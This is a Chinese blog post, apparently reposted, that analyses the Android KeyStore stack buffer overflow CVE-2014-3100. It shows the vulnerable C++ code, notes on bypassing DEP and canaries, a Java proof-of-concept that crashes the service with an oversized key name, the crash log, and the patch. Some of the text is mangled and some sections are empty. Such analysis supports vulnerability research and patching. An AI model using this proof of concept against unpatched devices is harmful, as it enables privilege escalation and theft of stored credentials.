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  • Android KeyStore Stack Buffer Overflow (CVE-2014-3100)


    本文章由 莫灰灰 编写,转载请注明出处。  

    作者:莫灰灰    邮箱: minzhenfei@163.com


    1. KeyStore Service

    在Android中,/system/bin/keystore进程提供了一个安全存储的服务。在过去的版本号中。其它程序主要用过UNIX socket的守护进程/dev/socket/keystore去訪问这个服务。






    虽然有专有硬件的支持,可是还是会有一些证书,比如VPN PPTP的证书,依旧会保存在本地磁盘上。



    2. Simplicity


    /* KeyStore is a secured storage for key-value pairs. In this implementation,
    * each file stores one key-value pair. Keys are encoded in file names, and
    * values are encrypted with checksums. The encryption key is protected by a
    * user-defined password. To keep things simple, buffers are always larger than
    * the maximum space we needed, so boundary checks on buffers are omitted.*/

    3. Vulnerability


    ResponseCode getKeyForName (
    <span style="white-space:pre">	</span>Blob * keyBlob ,
    <span style="white-space:pre">	</span>const android :: String8 & keyName ,
    <span style="white-space:pre">	</span>const uid_t uid ,
    <span style="white-space:pre">	</span>const BlobType type )
    	char filename [ NAME_MAX ];
    	encode_key_for_uid ( filename , uid , keyName );
    这个函数有好几个调用者,外部程序能够非常easy的通过Binder接口来调用它。(比如。int32_t android::KeyStoreProxy::get(const String16& name, uint8_t** item, size_t*


    static int encode_key_for_uid (
    	char * out ,
    	uid_t uid ,
    	const android :: String8 & keyName )
    	int n = snprintf ( out , NAME_MAX , "% u_ ", uid );
    	out += n;
    	return n + encode_key ( out , keyName );
    static int encode_key (
    	char * out ,
    	const android :: String8 & keyName )
    	const uint8_t * in = reinterpret_cast < const uint8_t * >( keyName . string ());
    	size_t length = keyName . length ();
    	for ( int i = length ; i > 0; --i , ++ in , ++ out ) {
    		if (* in < '0' || * in > '~ ') {
    			* out = '+' + (* in >> 6);
    			*++ out = '0' + (* in & 0 x3F );
    			++ length ;
    		} else {
    			* out = * in ;
    	* out = ' ';
    	return length ;

    4. Exploitation

    (1).数据运行保护(DEP)。这个能够採用Return-Oriented Programming (ROP)的方法绕过。


    (3).堆栈检測(Stack Canaries)。
    (4).编码。小于0x30 ('0')或者大于0x7e ('~')的字符会被编码之后再写回到缓存区中。

    只是好在Android KeyStore服务被结束了之后立即会重新启动,这个特性加大了攻击成功的概率。此外,攻击者理论上能够使用ASLR去对抗编码。

    5. Impact


    6. Proof-of-concept


    Class keystore = Class.forName("android.security.KeyStore");
    Method mGetInstance = keystore.getMethod ("getInstance");
    Method mGet = keystore.getMethod ("get", String.class);
    Object instance = mGetInstance.invoke( null ); inf
    mGet.invoke( instance ,
    " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
    " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
    " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
    " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
    " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
    " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
    " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ");


    F/ libc ( 2091): Fatal signal 11 ( SIGSEGV ) at 0 x61616155 ( code =1) , thread 2091 ( keystore )
    I/ DEBUG ( 949): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
    I/ DEBUG ( 949): Build fingerprint : ' generic_x86 / sdk_x86 / generic_x86 :4.3/ JSS15
    J/ eng . android - build .20130801.155736: eng / test - keys '
    I/ DEBUG ( 949): Revision : '0'
    I/ DEBUG ( 949): pid : 2091 , tid : 2091 , name : keystore >>> / system / bin / keystore <<<
    I/ DEBUG ( 949): signal 11 ( SIGSEGV ), code 1 ( SEGV_MAPERR ) , fault addr 61616155
    I/ DEBUG ( 949): eax 61616161 ebx b7779e94 ecx bff85ed0 edx b777a030
    I/ DEBUG ( 949): esi b82a78a0 edi 000003 e8
    I/ DEBUG ( 949): xcs 00000073 xds 0000007 b xes 0000007 b xfs 00000000 xss 0000007 b
    I/ DEBUG ( 949): eip b7774937 ebp 61616161 esp bff85d20 flags 00010202
    I/ DEBUG ( 949):
    I/ DEBUG ( 949): backtrace :
    I/ DEBUG ( 949): #00 pc 0000 c937 / system / bin / keystore ( KeyStore :: getKeyForName ( Blob * ,
    android :: String8 const & ,
    unsigned int , BlobType )+695)
    I/ DEBUG ( 949):
    I/ DEBUG ( 949): stack :
    I/ DEBUG ( 949): bff85ce0 00000000
    I/ DEBUG ( 949): bff85d48 00000007
    I/ DEBUG ( 949): bff85d4c bff85ed0 [ stack ]
    I/ DEBUG ( 949): bff85d50 bff8e1bc [ stack ]
    I/ DEBUG ( 949): bff85d54 b77765a3 / system / bin / keystore
    I/ DEBUG ( 949): bff85d58 b7776419 / system / bin / keystore
    I/ DEBUG ( 949): bff85d5c bff85ed4 [ stack ]
    I/ DEBUG ( 949): ........ ........
    I/ DEBUG ( 949):
    I/ DEBUG ( 949): memory map around fault addr 61616155:
    I/ DEBUG ( 949): ( no map below )
    I/ DEBUG ( 949): ( no map for address )
    I/ DEBUG ( 949): b72ba000 - b73b8000 r -- / dev / binder

    7. Patch


    ResponseCode getKeyForName ( Blob * keyBlob , const android :: String8 & keyName , const uid_t uid ,
    	const BlobType type ) {
    	android :: String8 filepath8 ( getKeyNameForUidWithDir ( keyName , uid ));
    android :: String8 getKeyNameForUidWithDir ( const android :: String8 & keyName , uid_t uid ) {
    	char encoded [ encode_key_length ( keyName ) + 1]; // add 1 for null char
    	encode_key ( encoded , keyName );
    	return android :: String8 :: format ("% s /% u_ %s ", getUserState ( uid ) -> getUserDirName () , uid ,
    	encoded );


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  • 原文地址:https://www.cnblogs.com/mengfanrong/p/4733582.html
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